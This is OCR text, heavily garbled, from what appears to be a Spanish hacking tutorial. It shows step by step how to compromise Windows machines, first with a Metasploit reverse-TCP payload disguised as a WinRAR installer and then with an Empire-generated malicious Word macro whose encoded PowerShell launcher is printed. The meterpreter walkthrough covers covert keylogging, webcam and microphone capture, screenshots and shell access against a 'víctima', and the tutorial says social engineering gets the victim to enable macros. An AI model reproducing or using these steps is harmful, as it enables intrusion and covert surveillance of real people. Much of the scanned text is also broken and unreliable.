LHOST The listen addres} le options (exploit/multi/handler) : 
LPORT 4444 The listen port 


Name Current Setting Required Description 


Exploit target: 


Id Name yload options (windows/meterpreter/reverse tcp): 


o Wildcard Target Name Current Setting Required Description 


Para darle valor a estas variables, basta con utilizar EXITFUNC process Exit technique 
la palabra reservada set, luego del nombre de la HOST 192,168, 1.0/ The listen address 


LPORT 443 The listen port 


variable y su valor. Recuerda que el LPORT tiene 





que ser igual al que pusiste en el payload, sin 


embargo, el LHOST siempre es la IP local, ya que 
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Y finalmente, escribimos la palabra reservada 
exploit para ejecutar el comando, en este punto 
estamos escuchando, esperando recibir las 
conexiones una vez que se ejecute el código 


malicioso en la máquina de la víctima. 


mst explo1t( ) > exploit 


E 


Cuando la víctima abra el archivo malicioso, por 
ejemplo, en este caso el WinRAR en un Windows, 
la terminal te mostrará que están llegando 
paquetes, la prueba de que tienes control del 
sistema es cuando aparece la palabra meterpreter 
>, que significa que estás dentro del sistema y 


tienes control de este. 


msf exploit( ) > exploit 


{*] Started reverse TCP handler on 192,168.1.67:443 
[*] Sending stage (179779 bytes) to 192,168.1,141 


[+] Meterpreter session 1 opened (192.168,1.67:443 -> 192,168,1.141;49813) at 2018-08-02 23:31:21 


meterpreter > | 
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[*] Started reverse TCP handler on 192.168.1.67:4 























revere 


Mientras que en la maquina de la víctima aparece 


como un programa cualquiera. 


Copyright © 1993-2017 
por Alexander Roshal 


Carpeta de destino 


maim Filan (vac MANRAR 
: m e poen E J WAR 
FA A les (x85) REA 


v | Examinar s. | 











Esta es una versión de prueba del compresor WinRAR. 
Cualquiera puede usarla durante un período de prueba de 40 días. 


POR FAVOR LEA DETENIDAMENTE EL ACUERDO DE 


LICENCIA SIGUIENTE ANTES DE CONTINUAR CON LA 
INSTALACION. 


ACUERDO DE LICENCIA DE USUARIO FINAL 


El siguiente acuerdo de licencia es una traducción del acuerdo original: 
escrito en inglés en incluido en la versión inglesa de WinRAR. En caso de 








| 





Si acepta el CONTRATO DE LICENCIA DE USUARIO FINAL (EULA), por favor pulse [Instalar]. Si no 


está de acuerdo, por favor pulse [Cancelar]. 
| | Cancelar | 





[Instalar 
Ahora, una vez que tienes un meterpreter, estas en 

_lo que se llama “sesión”, por ejemplo, en el caso 

anterior, es la sesión 1, pero si infectó a otra 


máquina, se abrirá una sesión 2, solo puedo 
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interactuar con una sesión a la vez, sin embargo, Con estos comandos puedes hacer cosas como 


puedo tener más de una sesión activa. obtener información del sistema, con sysinfo, del 

Para ver los comandos básicos que puedes hacer usuario, con getuid, capturas de pantalla, con 

en una máquina comprometida, puedes escribir la | screenshot, capturas de teclado(keylogger) con 

palabra reservada help, y te saldra una lista de | keyscan_start, entre otras cosas que mencionaré | 
comandos que puedes ejecutar. a continuacion. 


Stdapi; User interface Commands i: l 
Información del sistema 


Algo de lo primero que quieres hacer siempre que 


enumdesktops List all accessible desktops and window stations 
getdesktop Get the current meterpreter desktop 


idletime Returns the number of seconds the remote user has been idle f T esv ; po : i 
keyscan dump Dump the keystroke buffer RAT, es ver la información del sistema, es decir, 


keyscan start Start capturing keystrokes que sistema operativo es que IP tiene, etc 

keyscan stop Stop capturing keystrokes j i ' 
screenshot Grab a screenshot of the interactive desktop Para esto, puedes utilizar el comando sysinfo, que 
setdesktop Change the meterpreters current desktop á 


uictl Control some of the user interface components | te dirá el sistema operativo y versión de este del 


obtengas acceso a un sistema por medio de un 


sistema. 
Stdap1; Webcam Commands 


record mic Record audio from the default microphone for X seconds 
webcam chat Start a video chat 

webcam list List webcams 

webcam snap Take a snapshot from the specified webcam 

webcam stream Play a video stream from the specified webcam 
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meterpreter > nda 


Computer 


OS 


WIN-KA6NAUTILSB 


Windows 7 (Build 7609) 


Architecture ' x64 


system Language 
Domain 
Logged On Users : 2 
Meterpreter 





eS ES 
WORKGROUP 


x86/windows 





Camara Web y Microfono 


Para activar la camara web, basta con ejecutar el 
comando webcam_snap, y la camara se activara 
(la limitante es que si la camara esta bloqueada o 
tapada), muchas computadoras tienen LEDs que 
avisan Cuando se activa. 

ares vebcam snap 
| St arti alo eer, 
[+] Got frame 


n froot/oun UNZP 0.]peg 
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terpreter > screenshot 





reenshot saved to: /root/Desktop/glGz0kon.jpeg 


WHITE SUIT 


Por otro lado, el micrófono, activado con el 
comando record_mic -d <segundos a grabar> 
<ruta de grabado>, este comando es más útil para 
actividades de espionaje o auditoría, por ejemplo, 
si quisieras grabar 30 segundos el micrófono, 
escribirias record_mic -d 30 


meterpreter > record mic 


ISS ELA. 


'] Stopped 


Audio saved to: /root/azdMHLPA .way 





Captura de pantalla 


Otra cosa muy comun al hacer auditorias es ver 
que está haciendo o viendo la víctima, con el 
comando screenshot puedes obtener una captura 


de pantalla del sistema sin que la víctima se dé 





cuenta. 
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Antes de ver formas más sofisticadas de robar 
contraseñas, usaremos las más simples, que es 
grabar todo lo que la víctima teclea en la 
computadora con un keylogger, que se inicia con el 
comando keyscan_start, puedes ver lo que grabo 
con el comando keyscan_dump, y se detiene con 


el comando keyscan_stop. 





a | 
—á 


¿A 






aiaa. 











f L = | Documento - WordPad Lo 18 | x 
Inicio Ver m7) 


rr es dr ddr 2130 114 + oo 


Prueba, si esto fuera informacion sensible, se hubiera podido robar. 


reroreter > keyscan start 


‘ting the keystroke sniffer ... 

orpreter > keyscan dump 

ing captured keystrokes. .. 
AISCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYU 
\S><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULA 
WN YUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS><MAYUSCULAS>Prueba, si esto fuera infor 
ion sensible, se hubiera podido robar. 


erpreter > keyscan_stop 
ping the keystroke sniffer... 





Información del usuario 

Diferentes usuarios en un sistema tienen diferentes 
niveles de privilegios, así que es elemental saber 
qué nivel de privilegios tienes en el sistema, 


puedes obtenerlo con el comando getuid. 


terpreter > getulc 


rver username: WIN-KA6NAUTJLSB\WhiteSuit Hacking 














meterpreter > ps 


Process List 


PPID Name f Se User Path 


a TE Manejo de archivos 
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Ver procesos en segundo plano y volver al meterpreter usando 


S ; ; control z. 
También podrías ver todo lo que está haciendo el 


rerpreter > shell 
objetivo por medio de los procesos, los cuales cess 196 created, 
z yo y mel 1 created. 
podrás modificar, cerrar o utilizar para migrar, „soft Windows [Versión 6.1.7600] 


d | | d „right (c) 2009 Microsoft Corporation, Reservados todos los derechos. 
puedes ver IOS procesos con el comandado ps. 


sers\WhiteSuit Hacking\Downloads>*C 


Como puedes ver, nos muestra los permisos, rutas „inate channel 1? [y/N] n 
e identificaciones de los procesos. 


isers\WhiteSuit Hacking\Downloads>*Z 
kground channel 1? [y/N] 


NT AUTRORITYASYSTEM Ci \Windows\System32\smss, exe 
NT AUTHORITY\SYSTEM C; Windows CST5S. exe 


svchost.exe x6: ) NT AUTHORITY\Servicio de red C:\Windows 


csrss.exe x6 NT AUTHORITY\SYSTEH css, exe. Tanto en shell como en meterpreter, aunque con 


wininit. exe x6! - NT AUTHORITYASYSTEM 


S24 chrome.exe x6 WIN-KAGNAUTILSB\WhiteSuit Hacking C:\Program Files (x86) \Google\Chro 


n\chrome,.exe 





mas control y funcionalidad en el segundo, nos 


Shell 


podemos mover en los archivos del sistema y 
modificar, descargar, borrar o subir archivos, 
Hay algunos comandos que no puedes realizar en 


puedes usar comandos comunes de Linux para 
meterpreter, por que corre en base PowerShell, 


: moverte (dentro de meterpreter), o del sistema 
pero es muy sencillo pasarte a una shell con el 


l operativo donde estés si estas en una shell. 
comando shell. 
Una vez en una shell, puedes terminar la shell 


usando control c y volver a meterpreter, o ponerla 
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meterpreter > pwd Informacion de interfaces de red 


C:\Users\WhiteSuit Hacking\Downloads 
meterpreter > ls 


e | | $ | terno, una de 
Listing: C:\Users\WhiteSuit Hacking\Downloads Siempre que estés en un sistema ex 


las primeras cosas es saber cómo se está 


Size Hane conectando el sistema a la red y que IP tiene. 
100666/rw-rw-rw- 282 desktop. ini 


sacar esta información bastante fácil 
100777/rwxrwxrwx 2120192 fil 2018-08-02 23:30:39 -0500 winrar.exe Puedes 





pidiendo las interfaces con el comando ifconfig. 


Estos son algunos de los comandos que puedes Recuerda que luego este sistema te puede servir 


utilizar para esto dentro de meterpreter. para atacar a otros sistemas dentro de la misma 


checksum 
Cp 

dir 
download 
edit 
getlwd 


getwd 
lcd 
lls 
tpwd 
is 
mkdir 


search 


show mount 


upload 


Read the contents of a file to the screen 
Change directory 

Retrieve the checksum of a file 
Copy source to destination 

List files (alias for ls) 
Download a file or directory 
Edit a file 

Print local working directory 
Print working directory 

Change local working directory 
List local files 

Print local working directory 
List files 

Make directory 

Move source to destination 
Print working directory 

Delete the specified file 
Remove directory 

Search for files 

List all mount points/logical drives 
Upload a file or directory 
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red, así que conocer esta información es muy 


importante. 


meterpreter > ifconfig 


terface 11 


Conexión de red Intel(R) PRO/1000 MT 


rdware MAC : 00:0c:29:be:d4:77 


w : 1500 


W4 Address : 192,168,1,141 


v4 Netmask : 255.255.255.0 


6 Address : fe80::fcfc:1498:6662:5b26 


vo Netmask : Tfft:tttt:tttt: ttt: : 
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reels ot 


Archivos Office infectados (EMPIRE) Nota: Necesitas acceso a Office para crear este 


Un ejecutable infectado no es la unica forma de 
comprometer un dispositivo Windows, hay diversas 


formas de hacer esto, lo unico que se necesita es 


archivo malicioso. 


Instalacion Empire 


Antes de utilizar Empire, deberas instalarlo, para 


una forma de ejecutar codigo 0 comandos en el 


hacer esto, ve en la carpeta de Empire usando el 


sistema. Es aqui donde entra Empire, esta es una 


comando cd /opt/Explotacion/Empire, y luego a la 


herramienta que originalmente fue diseñada para 
post-explotación, pero también tiene algunas 


funcionalidades interesantes que se pueden utilizar 


carpeta setup escribiendo cd setup, y ejecuta el 


script de instalación con el comando ./install.sh. 


'/# cd /opt/Explotacion/Empire/ 


para comprometer un sistema Windows al abrir un 


documento Office como Word, PowerPoint y Excel, gelog Dockerfile 
OW} ILo 10S 


f 


notaras que esta herramienta tiene muchas 


Dt/E EXD Lota 


A T mr n E. 
:/opt/Explotacion/Emplt re# ls 


empire LICENSE README.md VERSION 


14 wm 1 _ "Wa e pee n 
L1b ptugins setup 


icion/Empire# cd setup/ 





similitudes con Metasploit en cuanto a estructura, : ¿OP opt/Explot tacion/Empire/setup# ls 

; V get-pip.py requirements.txt setup_database. py 
sin embargo, las palabras reservadas son h install, ch reset.sh yar-1.5.2 
diferentes así que toma esto en cuenta al utilizarla, — opt/Explotacion/Empire/setup# ./install.sh fj 


ademas, esta escrita en Python, mientras que 
Metasploit por el contrario en Ruby, lo que 
principalmente notaras es que Empire es mucho 
más sensible al uso de mayúsculas que Metasploit, 


en donde puedes utilizar o no utilizarlas. 
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Simplemente presiona enter en todas las 
preguntas, y al terminar el proceso de instalacion 


Empire deberia estar abierto. 
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pao E A a 5 ee. A Sa — Estructura de Empire 


ee eee Se AM E iS OSE eee 
— — — PP € ee ey ee ee Ee ee ee ee ee e a a a e m a e A A A O A A a mmmn a a e a e a a a a a e a —— ee 


ale La estructura de Empire esta dividida de manera 
ee ee eee muy similar a Metasploit, pero encontraras que es 
un poco menos predecible la estructura de esta, 
que esta dividida en tres funciones principales: 
1. Listeners 
Al igual que Metasploit, se necesita un manejador 
para escuchar las conexiones del codigo malicioso, 


282 modules currently loaded E Mos 
o RAT, que se ejecuta en la máquina del objetivo, 


O listeners currently active : 
sin embargo, aqui no se configura un escuchador, 

9 agents currently active si no un modelo de escuchador, y puedes tener 

| varios modelos para escuchar diferentes puertos y 

(Empire) > fj : 

tipos de conexiones al mismo tiempo, esta carpeta 


es donde estan estos modelos y la informacion 





Para abrir de nuevo Empire, deberas irte a la 
para configurarlos. 


2. Modules 


Los módulos en este caso son scripts de post- 


carpeta inicial de Empire, /opt/Explotacion/Empire 
y ejecutar el comando para iniciar Empire 


escribiendo ./empire en la terminal. 
explotación que se utilizan una vez que ya tengas 


:/opt/Explotacion/EmpireX ls acceso a un sistema. 
changelog data Dockerfile downloads em 
:/opt/Explotacion/Empire* ./empire | 
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3. Stagers 
Finalmente, los stagers en este caso actúan como 
el módulo de payload de Metasploit, esta parte de 
Empire es la que permite crear código malicioso 
que te dará acceso remoto al objetivo. 
También existe un concepto llamado agents, y 
esto se refiere a las máquinas a las que tienes 
acceso remotamente, es el equivalente en 


Metasploit a una sesión. 


Palabras reservadas Empire 


Al igual que Metasploit, Empire tiene varias 
palabras reservadas para diferentes usos, te 


explicare las principales. 


1. Help 


Este comando, que es el puedes utilizar en 


cualquier momento, te dará una lista de comandos 


que puedes ejecutar en ese momento. 
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2. Agents 
Este comando te mostrará los agentes, los cuales 
representan a los sistemas comprometidos y 
accesibles por la herramienta en ese momento. 

3. Interact 
Este comando te permitirá interactuar, en otras 
palabras, controlar, a algún agente, para esto basta 
con escribir interact <ID de agente> 

4. Listeners 
Este comando te mostrara los escuchadores que 
tengas corriendo en un dado momento, recuerda 
que, para poder realizar cualquier ataque, 
necesitas tener un escuchador levantado, si lo 
tienes iniciado al escribir listeners te mostrara algo 


como lo siguiente. 


> Listeners 


listeners: 
Module Host Delay/Jitter  KillDate 


http://192,168.1.67:80 
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5. Info 
Escribir info en un módulo o comando te mostrara 


las opciones que tienes para configurar, es decir, 


las variables del ataque, algo similar a lo siguiente. 
(Empire: ) > info 


Name: HTTP{S] 
Category: client server 


Authors: 
@harm) Oy 


Description: . PEP: 
Starts a http[s] listener (Powershell or Python) that uses a 
GET/POST approach. 

HTTP{S] Options: 

Name l Required Value Description 
SlackToken 
ProxyCreds 


ari BE Date for the listener to exit (M4/dd/yyyy). 
KitlDate 


Name if http Name for the listener. 
Launcher powershell -noP -sta «4 1 -enc Launcher string, 


6. Set 
Al igual que en Metasploit, la palabra set se utiliza 
para asignar valor a una variable, hay que recordar 
que aquí son muy importantes las mayúsculas, por 
ejemplo, para cambiar la variable Host, escribiría 


set Host y el valor, que en este caso es 


http://192.168.1.67:80 





Your SlackBot API token to communicate with your Slack 
Proxy credentials ([domainJusername: password) to use | 





Empire: ) > set Host http://192.168.1.6/:% 





cil] 


Al ejecutar el comando y confirmar con el comando 
info, podrás ver el cambio en la variable. 


True nttp://192.168,1,67:80 
7. Searchmodule 


Hostname/IP for staging. 


Para buscar algun modulo, es decir, comando que 
puedes utilizar en post-explotacion, basta con 
escribir el comando usemodule <busqueda>, en 
el que pones el script que estés buscando, por 
ejemplo, si busco un script que muestra un 
mensaje, escribiria searchmodule message, 


recibiendo la siguiente respuesta. 
(Empire) > searchmodule message 













python/trollsploit/osx/change background 


Change the login message for the user, 


powershell/trollsploit/message 


Displays a specified message to the user. 


python/trollsploit/osx/login message* 


Change the login message for the user, 














(Empire) > usemodule powershell/trollsploit /ness: NR fun 
(Empire: powershell, ‘trollspl lo1t/message ) >| Nttp http://192,168.1.6/:80 
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8. Usemodule 
10.List 


Este comando puede ser utilizado para enlistar 


Para utilizar alguno de los módulos, al saber su 
ruta, deberás utilizar el comando usemodule 


seguido de la ruta de este, por ejemplo, si listeners activos o agentes activos escribiendo list 


quisiéramos utilizar el comando en agents o list listeners. 


powershell/trollsploit/message, tendriamos que (Empire) > list listeners 
escribir usemodule | 


powershell/trollsploit/message 


, = E 
= J - 4 

‘ete ata = | cTtonarce 
RA- .1STeners. 


Name Module Host 


empire) > list agents 





9. Usestager 
Al querer usar un stager, es probablemente el Empire) > 
segundo paso que usaremos en un ataque 0 en la 
mayoría de ellos (lo primero sería lanzar un 
listener), escribirías usestager <ruta>, por 


ejemplo, usestager Iwindows/macro 


(Empire) > > EE ee EA 





)- 
L 


adier Atle y 

Y > YE | lA su E ber f 2 

E goms E Fi EJAJ à F 11 | * 

a et SO Fue $ i i£ A‘ G s 
ot - 
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11.Main 
La palabra clave main se utiliza en esta 


herramienta para volver al menú principal. 
(Empire) > help 


Commands 


Jump to the Agents menu. 
Add/display credentials to/from the database. 
Exit Empire 
Displays the help menu, 
interact Interact with a particular agent. 
list Lists active agents or listeners. 
listeners Interact with active listeners. 
Load Loads Empire modules from a non-standard folder. 
plugin Load a plugin file to extend Empire. 
plugins List all available and active plugins. 
preobfuscate Preobfuscate PowerShell module source files 
reload Reload one (or all) Empire modules. 
reset Reset a global option (e.g. IP whitelists). 


resource Read and execute a list of Empire commands from a fil 


searchmodule Search Empire module names/descriptions. 
set Set a global option (e.g. IP whitelists). 
show Show a global option (e.g. IP whitelists). 
usemodule Use an Empire module. 

usestager Use an Empire stager. 


12.Execute 
La palabra clave execute se utiliza en Empire para 
ejecutar stagers y módulos, es el equivalente de 


exploit o run de Metasploit. 
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Wee! 


Crear el archivo infectado de Microsoft 
Office 


Ahora vamos a crear un documento Word con 
codigo malicioso, este codigo hara que tengamos 
acceso remoto al powershell de Windows, lo cual 
compromete el sistema en un alto nivel 

Para esto, con Empire abierto, deberemos seguir 


los siguientes pasos. 


Crear un listener 


Primero que nada, en Empire debemos crear un 
listener, que va a ser utilizado para recibir las 
conexiones, asi como para configurar el codigo 
malicioso para que sepa a donde y por qué puerto 
mandar los paquetes. 

Para esto, primero utilizas el comando listeners, 
que te mostrara los listeners activos (si es que 
hay), y te metera a la carpeta de listeners, aqui 
puedes utilizar el comando help para ver el resto 


de los comandos que puedes utilizar. 
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(Empire) > listeners Escribe info para que veas las configuraciones 


enh ras etanan nels | posibles que le puedes hacer al listener, 
mpire: listeners | 


confirmaras que la variable Host esté correcta con 
Listener Commands 


to th Fo meni tu IP y tu puerto, normalmente Empire la 
agents Jump to the agen y 


Leon Gonbaeks to ine May menu; autoconfigura, asi que pocas veces tendras que 
creds Display/return credentials from the database. 


Eat Exit Empire. modificar esto. 
help Displays the help menu, 


info Display information for the given active listener, 
kill Kill one or all active listeners. 
tauncher Generate an initial launcher for a listener. 
list List all active listeners (or agents). Description 
listeners Jump to the listeners menu. ' alse Your SlackBot API token to communicate with your Stack instance. 
main Go back to the main menu. ds als default Proxy credentials ({donain\]username: password) to use for request (def 
resource Read and execute a list of Empire commands from a 1 2 Giada Comte hina 
uselistener Use an Empire listener module, True itp = ae for the Listener 
: ! True powersnett -noP -sta -w 1 -enc Launcher string, 
usestager Use an Empire stager, Delay True 5 Agent delay/reach back interval (in seconds), 
LostLimit True 60 Number of missed checkins before exiting 
WES False Hours for the agent to operate (09:00-17:00), 





ine False #general The Stack channel or DM that notifications will be sent to. 
ili i rofile True /admin/aet, php, /news.php,/togin/ Default communication profile for the agent 
Luego utiliza el comando uselistener http para | get php, /nens php | 


process. php|Mozilla/5.0 (Windows 


NT 6.1; WOW64; Trident/7.9; 
ili i er http, estos modelos rv:11,0) Like Gecko 
utilizar el modelo de listen p, http://192.168,1.67:80 Hostname/IP for staging, 
e ` Certificate path for https listeners, 
(hay varios) están en la carpeta listeners dentro de | jitter 0.0 Jitter in agent reachback interval (0.0-1.0). 
alse default Proxy to use for request (default, none, or other), 
à - defaul User-agent string to tise for the staging request (default, none, or ot 

la carpeta donde instalaste Empire. 


E82n TU=B62A(Yal”]:LiOHOdeS1bF1J Staging key for initial agent negotiation, 


(Empire: listeners) > uselistener htt) me p” Th 0 id oe ee 


Port for the Listener. 
Microsoft-115/7,5 Server header for the control server. 


i | URI for the stager. Must use /download/. Example: /download/stager php 
(Emplre: Fi | 
i 








Ahora para iniciar el listener, simplemente escribe 


execute y presiona enter, a este punto debería de 
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confirmarte que el listener fue iniciado Crear el código malicioso 


exitosamente. 


(Empire: ) > execute 6 Ahora vamos a crear el código malicioso, para 
[*] Starting listener 'http' 


* Serving Flask app "http" (lazy loading) esto, ejecutamos el comando usestager 


+ {ee z 4 s 
Environment: production windows/macro, esto lo que hace es llevarte al 


Use a production WSGI server instead, 
* Debug mode; off 


[+] Listener successfully started! en forma de macro para inyectar en archivos que 
(Empire: ) >] 


stager que es el que puede crear código malicioso 





puedan ejecutarlo, tal como los documentos de 


office. 






Escribe main y presiona enter, y en el menú 


principal ahora aparecerá el listener activo. 


mire) > usestager windows/macro 
pire: stager/windows/macro) > fj 





282 modules currently loade 





Al ejecutar el comando info, te mostrara las 


1 listeners currently active 


variables y los valores asignados a estos. 


O agents currently active 


(Empire) > main] 
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WHITE SUI] 
= E /root/Desktop/virus.txt con el comando set 
(Empire: stager/windoWs/macro] > 
eiM OutFile /root/Desktop/virus.txt 
Name: Macro 


Description: | | 
crate an office macro Tor Empire, compatible { 
with office 97-2003, and 2007 file types. E Pi AS — a 


ae ire: Stager/windows/macro) > set OutFile /root/Desktop/virus.txt 
Name Required Value Description | 


ihc j ; i ager for. | 
Listener to generate stage! | 
Listener /tmp/macro File to output macro to, otherwise Podemos confirmar los cambios con info. 
ae y displayed on the screen, | 
Switch, Obfuscate the launchel 
powershell code, Uses the | . stagen, 
obfuscateCommand for obfuscation types. 
For powershell only, noe se 
c S Invoke-ObTusCca mmand 

ul 1, Launcher\STDIN++\12467The l 
Pa ia Only used if Obfuscate switch 1s True, 
For powershell only. z 
Language of the stager to generate, 
Proxy credentials A | 
({domain\]username: password) to use Tor 
request (default, none, or other), Ear A 
User-agent string to use rc T. S 
request (default, none, oF other). 
Proxy to use for request (default, none, 


Obfuscate : False 


tion: 
ObfuscateCommand False tes an office macro for Empire, compatible 
iffice 97-2003, and 2007 file types. 
J owershell 
Language True p 


ProxyCreds False default 


Description 
Listener to generate stager for. 
/root/Desktop/virus.txtFile to output macro to, otherwise 
displayed on the screen, 
ern stager to retry False Switch. Obfuscate the launcher 
StagerRetries False % i n powershell code, uses the 
: connecting, ObfuscateCommand for obfuscation types, 
For powershell only, 
Token\ALL\i, Launcher\STDIN++\12467The Invoke-Obfuscation command to use, 
Only used 1f Obfuscate switch is True, 
For powershell only. 
| ge True powershell Language of the stager to generate. 
. . j wCreds False default Proxy credentials 
es, la primera, es e jo y 
Vamos a cambiar dos variables, p ({domain\]username:password) to use for 
request (default, none, or other). 


UserAgent False default 


Proxy False default 


cateCommand False 


Listener, en la cual le daremos el nombre del i 


default User-agent string to use for the staging 
request (default, none, or other), 
inici llama http, con | False default Proxy to use for request (default, none, 
listener que hemos iniciado, que ae P» or other). ri 
i rRetries False 0 Times for the stager to retry 
j http, y el segundo cambio 
el comando set Listener 


connecting. 





será la variable OutFile, que cambiaremos por la 


ruta donde guardaremos el código, que sera 
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Y ahora ejecutaremos el stager con el comando 





execute. 


ir taqer/windows/macro) > execute 
(Empire: stager/winaow 


Podemos observar que ahora en nuestro escritorio 
hay un archivo llamado virus.txt con codigo en 


Visual BASIC, este es nuestro código malicioso, 


vamos a necesitar integrarlo a un documento Word 


para que nos sea útil, selecciona el código y 








cópialo. 


















































t 
End Sub 


End Sub 





t 
VITUS. Txt 





End Sub 
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Sub Auto0pen() 
t 


Open + |i a! 
Bub Auto Open() 





Sub Document Open() 


Public Function t() As Variant 
Dim OXNK As String 
OXNK = “powershell -noP -sta -w 1 -enc SQBmACQAJABQAFMAVg" 


OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 
OXNK = OXNK + 


OXNK + 


Infectar el archivo office con el código 











"BFAHTAUWBJAEBADQBUAEEAQgBMAEUAL gBQAFMAVGBFAFIACWBp" 
"AEBAT QAUAEOAYOBKAEBACgAGACOAZwB LACAAMWADAHSAJABHAF" 
"AARGASAF SACGBFAEYAXQAUAEEAUWBZAEUADQBiAGWAWQAUAECA” 
"ROBUAFOAeQBWAGUAKAANAFMAeQBZAHQAZOBtACIATOBHAGIAYO" 
"BNAGUADQBLAG4AdAAUAEEAdQBOAGBADOBHAHQAaQBVAG4AL gBY" 
“AHQAaQBSAHMA JWApAC 4ALGBHAGUAVABGAEKAZQBQAEWARAAIAC" 
“ gAJwBj AGEAYwBoAGUAZABHAHLAbWB LAHAAUABVAGWAaQB j AHKA" 
"UWB lL AHQAGABpAG4AZWBZACCALAANAE4AIWArACCAbWBUAFAAGO" 
"BIAGWAaQB j ACWAUWBOAGEAUABpAGMAIJWADADSASQBMACGAJABH" 
"AFAARQAPAHSAJABHAFAAQWASACQARWBQAEYAL gBHAGUAGABWAE” 
"EADAB LAGUAKAAKAG4 AdQBMAEWAKQA7AEKARGADACQARWBQAEMA" 
"WWANAFMAYWByAGKACABOAETAJWArACCADABVAGMAaWwBMAGBA ZW" 
"BNAGKADgBnACCAXQApAHSAJABHAFAAQWBbAC CAUWBj AHIAaQBy" 
“AHQAQGANACSAIWBSAGBAYWBrAEWwAbwBnAGcAaQBuAGCAJWBdAF" 
"“ SAIWBFAG4AYQBIAGWAZQBTAGMACGBpAHAAGABCACCAKWANAGWA" 
“DWBjAGSATABVAGCAZWBpAG4AZWANAFOAPQAWADSAJABHAFAAQW" 
“BbACCAUwB j AHTAaQBwAHQAQgANACSAJWBSAGBAYwBrAEwAbwBn" 
“AGCAaQBUAGCA JwBdAF SA JWBFAG4AYQBiAGWAZQBTAGMACGBpAH" 

Plain Text w Tas Width: 8 + Lal Coll Y 





Ahora abre un documento de Office Word, y activa 
las opciones de desarrollador, para esto, deberás 


abrir la opción donde dice files. 
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Insert Draw Design 





Se E Cut 


Paste + . F T y +r abe x. 
¥ Format Painter 


‘Calibri (Body) > 11 


y 


Clipboard m Fon 


Seguido de eso, busca el botón de 
“opciones”, que debería estar hasta 


abajo en la sección a la izquierda. 


Ahora, vete a las opciones de 
“customize ribbon”, y asegúrate que 


la opción “developer” O desarrollador, 


este activada. 
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Save as Adobi 


PDF 


Print 


Account 


Feedback 


Options 


18 
aL 


lacros 
e Macro Security 


mt Center 


z $ Record Macro 


Hf 


fd 
Cheese commands Fom 


j Popular Commands 


sang 
=! Custamize the Ribbon and keyboard shortcuts. 


4| 





Accept Revision 
4dd Tabie 

Align Left 

Bullets 

Center 

Change List Level 
Copy 

Cut 


IDE 


¿ES A 1 


U x 


Delste 

Diaw Tabie 

Draw Verticali Text Box 

RJ Email 

find 

' Fit to Window Width 

Font 

Font Coler 

Font Settings 

Font Size 

Footnote 

Format Painter 

| Grow Font 

fy Inset Comment 

H= Insert Page Section Breas 
ci Insert Picture 


>> DbeER 


a 


4 


Insert Text Box 
(tz 
HE 


y Line and Paragraph Spacing 





Define New Number Format... 


Keyboard shortcuts | Customize... | 


PE FAN 


Customize the Ribbon: 


Main Tabs 





pel Wyinsert {Bigg Post) 

8) A Guttining 

¡El þv Background Removal 
E [4 Home 

E Clipboard 

i E Font 

i E Paragraph 
i t& Styles 
| 
i 





E Editing 
Fi Voice 
Hes) insert 
ja M Draw 
im A Design 
i EJ Laycut 
1 
i References 
¡5 M] Maiings 


(a Review 


iE El Views 

i Add-ins 
la E Help 

E MaAcrosal 


New Tab | | New Group | Renee; | 


Customizations: | Reset ¥ jo 
| import/Export + lo 





Ahora notaras que en la barra de opciones en la 


parte superior tienes una opción que se llama 


desarrollador o developer, haz clic en esta, y en el 


H 


Home inset Draw Design Layout 








MO Pause Recordta 


Add- Word COM 


Code Add-ins 


botón que dice “visual basic”. 


References 


a My ==] Aa Aa {= E M Design Mode 
0 + [] E Properties 


ins Add-ins Add-ing Ea St” 


Review View Help 





‘ a 
| S SH 
S- UN 


XML Mapping 
Pane ALLS 
Mapping Protect 


y 





ACROBAT 





oct Restrict Document 
Editing Template 


Templates 











ttrt 


AGN UAGRRAGANAdAóS 
ae p 
| 
fi 
E 
y 
i 
E 


0.8 ON USO RL e 


ame 
came 
aT 
Lo vrs 
cuz 
Caz 
wT 
eaz 
oam 
pao 
uz 
pd 
acz 
cz 
coz 
wg 
cuz 
== 
Cons 


Set abjtcnfag > objScarvcr.Speeniostance 
obsCenf29.ShovBindos = EEES | Ta 
Set <BpFrocess = TM i nm 
objfrocers Creste CO, Fail, obiócnfig, inufroceraib 


WHITES 


Ahora haz clic en el documento a la izquierda. 





27 Microsoft Visual Basic for App 
File Edit View Insert Fo 
i ial | fs -3 =, 3 


Project - Project 


kd z 
dl eel 





Y te debería aparecer una consola en blanco, ahí 


pega el código que generaste en Empire. 


| 
| 


| 
; 
i 


Ue 
n 


=uimpter = 9.9 a 7 
Sev chyeiiService = Geclbject "simmar ly" 4 sl Comparar $ "uenricim2”) 
jar = coiM@ilSerst: 


of. 680} *Fn32_Ers sesaicectat") 


i svcCsegeter p Musica ¥inss_Fzocess*} 
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Una vez hecho esto, haz clic en el icono 
: File Edit 


e E 





de grabado en la parte a la izquierda 


superior, y grábalo como un documento 
.doc. 











x 
+ + To» ThisPC > Desktop > Libro við Searchbitro P: 
New Folder Hi = Q 
e Name 5 Date modtied Type Size 
Mo tenu mech your search, 
mM (C3) 
Drive (E) WE 
$ > mn Y 
j Meios [views {wi 
aae | 
as type | Word RS pi E 


Weird Document (*.docx) 

Authors Word rd Macro-Enabled Document (*.docm) 

fo ag ow De f 
[Youd Templa te (*. dot) 
iW o-Enabled Template (*.dotm) 
Wo eS 97. 3003 Te emplate dot) 
POF (pdf) 
XPS Document ("x 
{Single File Web vee EC mht: *mhtmi) 
Web Page (*.htm;* 


< Web Page, aait. Meris „htmi}) 
Rich Text Format (*.rtft 
4 ¿Plain Text (*.bt) 
Werd XML Document (* xml) 
= Word 2003 XML Document (* xml) 
—« {Strict Open XML Document doo} 
OpenDocument Text (*.odt) 


¡Listo! Ya tienes, por un lado, el escuchador, y por 
_ otro, el archivo Word con código malicioso, $ 


ahora si tu víctima abre el archivo Word y 





acepta la barra superior (lo cual con ingeniería q 
social es fácil de conseguir), tendrás acceso 
